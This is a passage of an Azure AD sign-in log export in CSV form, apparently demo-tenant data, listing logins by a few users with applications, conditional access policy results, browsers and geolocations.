'83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",bb151037-c810-45a4-b0e0-68cfcd300000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,bb151037-c810-45a4-b0e0-68cfcd300000,SigninLogs,Sucess,32.32146072,34.85319901
+572,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:05.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,07f70d72-6cd6-4854-8b47-6530f7851155,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",23877b62-2023-4ce4-9fb4-bf6524d41a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,23877b62-2023-4ce4-9fb4-bf6524d41a00,SigninLogs,Sucess,33.7984581,-84.38828278
+573,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,19851ed5-dfd6-480d-b2bf-3e25cff3d50e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",99101c3d-fa2a-42b6-a9d2-fbb930fa1a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99101c3d-fa2a-42b6-a9d2-fbb930fa1a00,SigninLogs,Sucess,50.6406517,5.572050095
+574,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:08.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,17e96a23-8d7e-4db9-80ed-c50afcdcc12e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ad09f59c-2ec1-4ebf-90ab-0f25d4131c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ad09f59c-2ec1-4ebf-90ab-0f25d4131c00,SigninLogs,Sucess,50.6406517,5.572050095
+575,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:21.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b9c440cc-ca58-446c-a39b-ca5d1c6fc16f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",aa57d52a-288e-488c-a4a9-011b94351b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,aa57d52a-288e-488c-a4a9-011b94351b00,SigninLogs,Sucess,33.7984581,-84.38828278
+576,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:30.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,35fdddb9-6b08-400a-aca3-179a2a0ee7ab,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",aa57d52a-288e-488c-a4a9-011bcf361b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,aa57d52a-288e-488c-a4a9-011bcf361b00,SigninLogs,Sucess,33.7984581,-84.38828278
+577,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:16.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,49aa38bd-08fe-402e-a0f0-3ad25a1c4dd9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:13,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5b07faad-beec-46e1-ae61-d56d7a1c1f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5b07faad-beec-46e1-ae61-d56d7a1c1f00,SigninLogs,Sucess,33.7984581,-84.38828278
+578,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:29.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3fc322f-138c-49fb-92e5-4ec4ac96bcc5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 